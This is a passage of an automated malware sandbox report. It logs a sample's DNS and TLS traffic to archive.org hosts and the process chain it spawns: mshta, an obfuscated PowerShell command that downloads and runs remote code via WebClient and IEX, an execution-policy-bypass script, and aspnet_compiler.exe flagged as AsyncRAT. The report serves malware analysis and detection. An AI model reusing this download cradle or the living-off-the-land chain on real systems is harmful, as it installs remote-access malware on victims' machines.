                                                                                                                                                                                                                  Jun 11, 2021 06:35:07.370659113 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:40.151109934 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:40.225353956 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:41.274629116 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:41.334985971 CEST53568038.8.8.8192.168.2.3

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.302654982 CEST192.168.2.38.8.8.80xa7b8Standard query (0)ia601502.us.archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.073461056 CEST192.168.2.38.8.8.80x7a3bStandard query (0)ia601509.us.archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.809737921 CEST192.168.2.38.8.8.80x3460Standard query (0)ia601406.us.archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.730957031 CEST192.168.2.38.8.8.80xc597Standard query (0)archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.659003973 CEST192.168.2.38.8.8.80xfc0bStandard query (0)ia803408.us.archive.orgA (IP address)IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.373203039 CEST8.8.8.8192.168.2.30xa7b8No error (0)ia601502.us.archive.org207.241.227.112A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.136739016 CEST8.8.8.8192.168.2.30x7a3bNo error (0)ia601509.us.archive.org207.241.227.119A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.880702019 CEST8.8.8.8192.168.2.30x3460No error (0)ia601406.us.archive.org207.241.227.126A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.794511080 CEST8.8.8.8192.168.2.30xc597No error (0)archive.org207.241.224.2A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723062992 CEST8.8.8.8192.168.2.30xfc0bNo error (0)ia803408.us.archive.org207.241.232.198A (IP address)IN (0x0001)

                                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.820400953 CEST207.241.227.112443192.168.2.349715CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587261915 CEST207.241.227.119443192.168.2.349719CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297117949 CEST207.241.227.126443192.168.2.349727CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208666086 CEST207.241.224.2443192.168.2.349728CN=*.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:33 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:08 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:24.134897947 CEST207.241.232.198443192.168.2.349729CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  Analysis Process: xGrfj8RvYg.exe PID: 4832 Parent PID: 5728

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:33:57
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\xGrfj8RvYg.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Users\user\Desktop\xGrfj8RvYg.exe'
                                                                                                                                                                                                                  Imagebase:0x8c0000
                                                                                                                                                                                                                  File size:20480 bytes
                                                                                                                                                                                                                  MD5 hash:722603AA75534BEC9D1191F062FB2C03
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                  Analysis Process: mshta.exe PID: 1276 Parent PID: 4832

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:33:58
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
                                                                                                                                                                                                                  Imagebase:0x7ff645c70000
                                                                                                                                                                                                                  File size:14848 bytes
                                                                                                                                                                                                                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Analysis Process: powershell.exe PID: 3468 Parent PID: 1276

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:01
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
                                                                                                                                                                                                                  Imagebase:0x7ff785e30000
                                                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Analysis Process: conhost.exe PID: 1564 Parent PID: 3468

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:02
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Analysis Process: powershell.exe PID: 3680 Parent PID: 3468

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:34
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
                                                                                                                                                                                                                  Imagebase:0x7ff785e30000
                                                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Analysis Process: aspnet_compiler.exe PID: 6396 Parent PID: 3680

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:49
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Imagebase:0x780000
                                                                                                                                                                                                                  File size:55400 bytes
                                                                                                                                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Analysis Process: aspnet_compiler.exe PID: 6800 Parent PID: 3680

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:35:09
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Imagebase:0xa70000
                                                                                                                                                                                                                  File size:55400 bytes
                                                                                                                                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                  Reset < >